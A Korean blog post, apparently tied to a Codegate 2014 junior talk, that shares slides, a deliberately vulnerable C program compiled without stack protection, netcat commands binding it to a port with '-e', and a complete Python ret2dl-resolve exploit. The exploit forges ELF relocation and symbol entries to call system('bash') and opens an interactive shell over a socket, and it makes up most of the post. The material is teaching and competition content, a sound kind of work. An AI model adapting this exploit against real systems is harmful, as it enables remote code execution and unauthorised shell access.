발표자료가 아주 전에 낸걸로 들어가서..
그리고 댓글 남겨주세요 ㅠ 무플 방지
코게 주니어.key 2.zip - 맥용 키노트 파일
코게 주니어.ppt - PPT로 변환함
어느분이 고맙게도 제 발표영상을 온라인에 찍어서 올려주셨어요. 감사합니다!
발표자료에 있는 "공격 대상 코드"
exp.c
#include <stdio.h> #include <string.h> char gbuf[128]; int main() { char buf[16]; int len = read(0, buf, 128); read(0, gbuf, 128); return 0;}
컴파일된 바이너리(CentOS)
exp컴파일 옵션:
gcc -fno-stack-protector -m32 exp.c -o exp
데몬 실행 (리눅스)
nc를 이용한 방법:
nc.traditional -l -p 7777 -e ./exp
또는
nc -l -p 7777 -e ./exp
inetd, xinetd로 설정하실수도 있습니다.
익스플로잇 코드
exploit.py
from socket import * import struct import time import sys buffer = 0x8049680 # "gbuf" address, you must know the address for your payload target = 0x8049658 # read GOT location dynstr = 0x80481FC # .dynstr section jmprel = 0x8048278 # referred in dynamic section symtab = 0x80481ac # referred in dynamic section ######## exploit gadgets ################################## dynamic_linker = 0x80482C0 target_plt = 0x80482F0 cmd = "bash #" # shell command to execute p = lambda x: struct.pack("<L", x) ph = lambda x: struct.pack("<I", x) pb = lambda x: struct.pack("<B", x) log = lambda x: sys.stderr.write(x+'\n') ######## rel ############################################## rel = p(target) # target, anywhere in writable memory rel += p((((buffer - symtab + 18+16)/16)<<8) + 7) # 16 multiplier (struct) ######## sym ############################################## sym = p (buffer - dynstr + 46) # location for 'cmd' sym += p (0xff) # writable int, isn't it? sym += p (0xff) # symbol size (st_size) sym += pb(0xff) # symbol info (st_info) sym += pb(0xf0) # symbol other - mod 4 must be 0 sym += ph(0xffff) # symbol index sym += "system\x00" ############################################################ s = socket(AF_INET, SOCK_STREAM) payload = "" payload += rel # struct Elf32_Rel -> Elf32_Sym payload += "A"*(28-len(payload)) # dummy for multiplier 16 payload += sym # struct Elf32_Sym -> "system\x00" payload += cmd ######### stage0 ###################################### stage0 = "" stage0 += "A" * 28 stage0 += p(0xDEADBEEF) stage0 += p(dynamic_linker) # dynamic linker loader (pushes arg1) stage0 += p(buffer - jmprel) # arg2: index here stage0 += p(0xDEADBEEF) # ret2: ret after 'system' stage0 += p(buffer + len(payload) - len(cmd)) # location for cmd stage0 = stage0.ljust(128) stage1 = payload # just for fun ####################################################### s.connect(('10.211.55.8'modify_here, 7777modify_here)) print "============== exploit: TRIGGER!" s.send(stage0) s.send(stage1) # and there will be console while True: r = raw_input() s.send(r+'\n')
sys.stdout.write(s.recv(102400))
modify_here부분에서 에러가 날건데, 그부분은 각자의 IP와 포트로 수정해주셔야될거에요.
로컬의 경우에는
s.connect(('10.211.55.8'modify_here, 7777modify_here)) print "============== exploit: TRIGGER!" s.send(stage0) s.send(stage1)
부분을
sys.stderr.write("============== exploit: TRIGGER!")
print(stage0 + stage1)
로 바꿔주시고
(python exploit.py;cat)|./exp
로 실행시켜주시면 됩니다.
'코드게이트 2014' 카테고리의 다른 글
| 코드게이트 2014 주니어 발표를 하게 되었어요 (0) | 2014.03.30 |
|---|